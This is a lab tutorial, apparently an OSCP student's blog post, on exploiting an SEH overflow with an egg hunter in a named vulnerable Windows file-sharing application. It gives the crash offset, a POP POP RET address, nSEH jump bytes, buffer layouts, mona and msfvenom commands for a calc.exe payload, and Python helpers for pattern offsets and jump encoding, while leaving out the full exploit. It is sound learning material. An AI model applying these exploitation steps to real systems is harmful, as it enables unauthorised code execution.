SEH Overflow + Egg hunter in 1 go!


Hello pee-ple,

As the OSCP PWK course only covered basic stack-based overflow exploitation, I decided to learn about SEH overflows and the concept of egg hunters!

I will not be talking about the theory behind those 2 in this post.
Instead, I will be writing up how to exploit them.

I will rewrite the existing exploit from scratch, and hopefully it might be helpful to some of you haxxers out there!

Prerequisites:
Understanding of buffer overflows (simple stack-based)
Configured Immunity Debugger and Mona.py
Read up on nSEH/SEH overflow concepts
Read up on egg hunter concepts

Existing exploit available at –
https://www.exploit-db.com/exploits/40178/

Vulnerable application that we are attacking –
https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe

My target VM:
Windows XP SP3

My attacking VM:
Kali Linux

Let’s begin~!

Set up with Immunity Debugger and Mona.py

[Screenshot: setup1]

The application will crash when sent 4500 bytes of junk.
After sending the 4500-byte junk buffer, press Shift + F9 to pass the exception to the program, and you should see that the EIP register is overwritten with "A"s.

pattern_create.rb -l 4500
pattern_offset.rb -q $overwritten_eip_value
offset = 4065
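As an added example (my own code, not from the original post and not Metasploit's scripts), here is a from-scratch Python version of what pattern_create.rb and pattern_offset.rb do: generate the cyclic pattern and look up the offset of the 4 bytes that landed in a register, taking the value the way the debugger prints it (little-endian). The function names are mine; the 4065 result above can be reproduced with it.

```python
import string

# Added example: a from-scratch Python version of the cyclic pattern used by
# Metasploit's pattern_create.rb / pattern_offset.rb (function names are mine).
# The pattern is the sequence of all Upper+lower+digit triples, so any 4-byte
# window occurs at exactly one offset (max length 26*26*10*3 = 20280 bytes).

MAX_PATTERN_LEN = 26 * 26 * 10 * 3


def cyclic_pattern(length):
    """Return the first `length` bytes of the Aa0Aa1...Zz9 pattern."""
    if length > MAX_PATTERN_LEN:
        raise ValueError("pattern longer than %d bytes repeats" % MAX_PATTERN_LEN)
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern, register_value):
    """Offset of the 4 bytes that ended up in a register, or -1 if not found.

    `register_value` is the value as the debugger shows it (e.g. "46356646" or
    0x46356646); x86 is little-endian, so the bytes in memory are reversed.
    Raw bytes are also accepted and searched as-is.
    """
    if isinstance(register_value, str):
        register_value = int(register_value, 16)
    if isinstance(register_value, int):
        needle = register_value.to_bytes(4, "little")
    else:
        needle = bytes(register_value)
    return pattern.find(needle)


if __name__ == "__main__":
    p = cyclic_pattern(4500)
    # Whatever lands in EIP at offset 4065 resolves back to that offset.
    value_at_4065 = int.from_bytes(p[4065:4069], "little")
    print("register shows %08x -> offset %d"
          % (value_at_4065, pattern_offset(p, value_at_4065)))
```

Because every triple is unique and the three character classes never line up at a different alignment, a 4-byte window can only match at one place, which is why the lookup is unambiguous.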

Subtract 4 from the offset: the 4 bytes just before the handler become the nSEH field ("B"), and the handler pointer itself is overwritten with the "C" buffer.
Your exploit PoC should look something like this:

junk = "A" * 4061 + "B" * 4 + "C" * 4 + "D" * 431

“B” -> nSEH
“C” -> SEH

Launch the exploit PoC; it should trigger an access violation. Continue by passing it with Shift+F9, and you should notice that EIP is overwritten with 43434343 ("C" * 4).

[Screenshot: poc1]

Now we should look for the address of a POP POP RETN instruction so we can land onto our "B" * 4 (nSEH) buffer. Run "!mona seh" on the Immunity Debugger console.

!mona seh

Locate your Immunity Debugger folder (example: C:\Program Files\Immunity Inc\Immunity Debugger) and open the seh.txt that mona writes there.

[Screenshot: sehppr]

It will contain all the POP POP RET addresses; choose one whose address does not contain any bad characters such as \x00.

I decided on the address 0x1002379d

Replace the “C” * 4 with the PPR address that you have chosen

Restart your Immunity Debugger and reattach the process by pressing CTRL + F2, go to your PPR address 1002379d and set a breakpoint.

Rerun your updated PoC exploit. Press Shift + F9 to pass the exception first, then step with F7; you should end up at the "B" * 4 buffer after stepping through the POP POP RETN instructions.


Step over the POP POP RETN with F7.


Awesome.

Now we need to jump backward into our "A" buffer.
"\xEB\xC4\x90\x90" will jump backwards 60 bytes: \xEB is the 2-byte short jump opcode, \xC4 is the signed 8-bit displacement (-60 in two's complement, counted from the byte after the instruction), and the two \x90 NOPs pad the 4-byte nSEH slot.
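To check the jump arithmetic instead of trusting the calculator, here is an added example (my own code, not from the original post) that encodes and decodes the 2-byte jmp short and works out where the jump placed at nSEH lands in the PoC buffer, using the 4061/4065 offsets from the PoC above. Function names are mine.

```python
# Added example (not from the original post): x86 `jmp short` encoding and the
# landing point of the nSEH jump in the PoC layout. Offsets come from the post.

SEH_OFFSET = 4065             # pattern_offset result for the SEH handler
NSEH_OFFSET = SEH_OFFSET - 4  # nSEH sits directly before the handler pointer


def encode_short_jmp(displacement):
    """EB rel8: a 2-byte jump whose displacement is counted from the byte
    after the instruction and must fit in a signed byte."""
    if not -128 <= displacement <= 127:
        raise ValueError("displacement %d does not fit in rel8" % displacement)
    return bytes([0xEB, displacement & 0xFF])


def decode_short_jmp(code):
    """Inverse of encode_short_jmp: recover the signed displacement."""
    if len(code) < 2 or code[0] != 0xEB:
        raise ValueError("not a jmp short")
    rel8 = code[1]
    return rel8 - 256 if rel8 >= 128 else rel8


def nseh_value(displacement):
    """The 4-byte nSEH slot: the jump plus two NOPs of padding."""
    return encode_short_jmp(displacement) + b"\x90\x90"


def landing_offset(jmp_offset, displacement):
    """Buffer offset where execution resumes after a jmp short at jmp_offset."""
    return jmp_offset + 2 + displacement


def has_bad_chars(data, bad=b"\x00"):
    """True if any byte the target would mangle or terminate on appears in data."""
    return any(b in data for b in bad)


if __name__ == "__main__":
    stub = nseh_value(-60)
    print(stub.hex(), "lands at offset", landing_offset(NSEH_OFFSET, -60),
          "bad chars:", has_bad_chars(stub))
```

With the post's layout the jump at offset 4061 resumes at 4061 + 2 - 60 = 4003, well inside the "A" buffer, and the 4-byte stub contains no \x00.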

Update your PoC exploit and replace the “B” * 4 with “\xEB\xC4\x90\x90”

Your PoC exploit should look something like this.


Set a breakpoint at your chosen PPR address again and rerun your updated PoC exploit. Press Shift + F9 to pass the exception first, then step with F7; you should end up at the "B" * 4 slot, which is now replaced with "\xEB\xC4\x90\x90" (jump backward 60 bytes), and by stepping once more you should land in the "A" buffer.

The “\xEB\xC4\x90\x90” in Immunity Debugger.


Stepping over with F7 should land you into the “A” buffer.


Nice. You are all set to send your Egg Hunter tag, shellcode, and everything else in 1 go!

Generate your Egg Hunter tag with the following command on Immunity Debugger console.

!mona egg -t p0rn

Copy and paste the generated 32-byte egg hunter into your PoC exploit.


Generate your shellcode with msfvenom (the encoder name is x86/alpha_mixed and the output format flag takes "c" as its argument):
msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c

Your final exploit PoC should look something like this:


All is set, embrace teh calculator!


Neat!

Note that there are other ways to pwn this application. Just having my own way of fun.
I have decided to exclude my full exploit code so that you can try it out yourself!

I know that SEH overflows and the egg hunter concept are obsolete. But...... It is always good to learn new stuff! Well, at least for me.

Stay safe people!

~9emin1